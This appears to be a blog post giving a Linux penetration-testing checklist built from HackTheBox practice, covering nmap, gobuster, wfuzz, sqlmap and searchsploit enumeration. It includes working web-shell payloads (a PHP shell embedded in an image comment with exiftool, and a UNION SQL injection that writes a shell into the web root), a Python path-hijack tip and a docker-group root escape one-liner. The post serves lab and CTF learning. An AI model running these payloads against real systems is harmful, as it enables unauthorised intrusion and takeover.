It happens a lot of times when pentesters miss out a simple thing while pentesting and incomplete enumeration results can cause complications. And in that sense, a checklist can always save you from remembering each and every step of pentest.<\/p>\n\n\n\n
In recent months, I solved a lot of hackthebox machines which really helped me build up a penetration methodology. And honestly speaking, there can be multiple ways to approach while pentesting. But there are few steps that remain constant for any server you pick. The key part is to make a thorough enumeration on those so that we dont miss even the slighest potential information that can lead to a compromise.<\/p>\n\n\n\n
In this blog post, I will be summarising all the points that one must really look into while testing any linux machine. <\/p>\n\n\n\n
There are manifold ways to get a initial foothold over the box. And it solely depends on the open ports. So lets dig into the common enumeration steps to get the intial foothold over the box.<\/p>\n\n\n\n
Run namp scans for both TCP and UDP. Always run a fullport scan alongside.<\/p>\n\n\n\n
# nmap -sC -sV 10.10.10.X -o tcp.nmap\n# nmap -sU -vvv 10.10.10.X -o udp.namp\n# nmap -p- -sV -A -T4 -vv 10.10.10.X -o fullport.nmap<\/pre>\n\n\n\nIf port 80 is open<\/h3>\n\n\n\n
Check for .git<\/p>\n\n\n\n
Run a dirbuster\/ gobuster scans. Here’s a small script that you can use to run your scan against multiple wordlists and save the output to a file. ( PS: there are scenerios, where a particular wordlist is required to obtain the results.<\/p>\n\n\n\n
#!\/bin\/bash\n\nwordlist=(\/usr\/share\/seclists\/Discovery\/Web-Content\/big.txt \/usr\/share\/seclists\/Discovery\/Web-Content\/common.txt \/usr\/share\/dirbuster\/wordlists\/directory-list-2.3-medium.txt \/usr\/share\/wordlists\/rockyou.txt)\n\ntouch gobuster.scans.out\n\nfor w in \"${wordlist[@]}\"\ndo\n echo \"\"\t\n echo \"$w \"\n echo \"$1\"\n gobuster -u $1 -w $w -t 50 | tee -a gobuster.scans.out| sort gobuster.scans.out| uniq \ndone\n\n# usage : bash script.sh http:\/\/10.10.10.10<\/code><\/pre>\n\n\n\nRun gobuster scans with flags like -x php, txt (to enumerate files with extension), -s 200,301,302 (To only look upon certain response codes)<\/p>\n\n\n\n
# gobuster -u http:\/\/example.com -w \/usr\/share\/seclists\/Discovery\/Web-Content\/big.txt -t 50 -x txt<\/pre>\n\n\n\nCheck the page source<\/p>\n\n\n\n
When every word in a wordlist gives a 200 OK or a 301, you need to use a fuzzer. wfuzz and ffuf are best options. Fuzzers can also be used for directory or file enumeration.<\/p>\n\n\n\n
# for parameter enumeration\n> wfuzz -w \/usr\/share\/dirbuster\/wordlists\/directory-list-2.3-medium.txt -u http:\/\/10.10.10.69\/sync?FUZZ=test\n\n# output after filtering the response size\n> .\/ffuf -w \/usr\/share\/seclists\/Discovery\/Web-Content\/burp-parameter-names.txt -u http:\/\/fluxcapacitor.htb\/sync\\?FUZZ=yesterday -fs 19<\/pre>\n\n\n\nGot a login form? Capture the request in burp (save it login.req) and scan for any sql injections<\/p>\n\n\n\n
# sqlmap -r login.req --all --batch --level 3 --risk 3<\/pre>\n\n\n\nCMS( Content Management System) is present?<\/h3>\n\n\n\n
If a CMS is present on the box, always search for its directory structure on github. In most of the cases you will be successful in finding one as most of them are open source.
\n Search for the files where CMS stores its sensitive information such as credentials or config files.
\n Search for the default credentials of CMS.
\n Find the version of CMS that is running on the box and perform a searchploit againt it.<\/p>\n\n\n\n# searchsploit CMS<\/pre>\n\n\n\nSearching for directory structure can be useful as sometimes the wordlists are unable to bruteforce the directories\/files. <\/p>\n\n\n\n
Shell upload<\/h2>\n\n\n\n
Want to upload a shell on places with restricted file types?<\/p>\n\n\n\n
With exiftool, one can embed the shell code inside an image. This wont create any hinderance in the extension restriction. <\/p>\n\n\n\n
# exiftool -Comment='\"; $cmd = ($_REQUEST['cmd']); system($cmd); echo \"\"; die; }?>' master.jpg<\/pre>\n\n\n\nIf sql injection is present, try uploading the shell. <\/p>\n\n\n\n
Firstly, try to enumerate the number of columns present. This can be done using order by clause. After determining the number of columns, combined with union to perform union-based SQL injections. For see practical implementation, visit here<\/a><\/span>.<\/p>\n\n\n\n
' union select 1, '<?php system($_GET[\"cmd\"]); ?>' into outfile '\/var\/www\/html\/cmd.php' #<\/code><\/pre>\n\n\n\nApproaches to privilege escalation<\/h2>\n\n\n\n
Once inside the box, you get the privilege of using enumeration scripts that do a hell lot of work for you. The best options available are LinEnum.sh and LinPeas.sh. <\/p>\n\n\n\n
So lets dig into what to exploit, once indise the box!! Here’s another checklist that can help you get your way through.<\/p>\n\n\n\n
Check the contents of \/var\/www\/html for sensitive contents like config files, database files.<\/p>\n\n\n\n
Check for users.xml, if tomcat is present<\/p>\n\n\n\n
Found sudo ? Do a sudo -l<\/p>\n\n\n\n
Check files with suid but set<\/p>\n\n\n\n
Check for all the listening ports in the output of netstat. Check if the obtained ports can be mapped to default service. ( PS: One cant always remember 5 digit port number that has a service mapped to it)<\/p>\n\n\n\n
If any named service is running, check for its exploits on the version running<\/p>\n\n\n\n
A python file runs with sudo privileges? Check for the python path, if we could inject our malicious module in the directory to gain elevated privileges.<\/p>\n\n\n\n
# checking python path. Path in which python looks to import its modules\/ libraries\npython -c 'import sys; print(sys.path)';<\/pre>\n\n\n\nDocker is present??<\/h2>\n\n\n\n
Try to find the credentials to get a way inside docker.<\/p>\n\n\n\n
Any user is part of docker group? You can easily get a shell. Exploit details can be found here<\/a><\/span>.<\/p>\n\n\n\n
docker run -v \/:\/mnt --rm -it alpine chroot \/mnt sh<\/span><\/code><\/pre>\n\n\n\n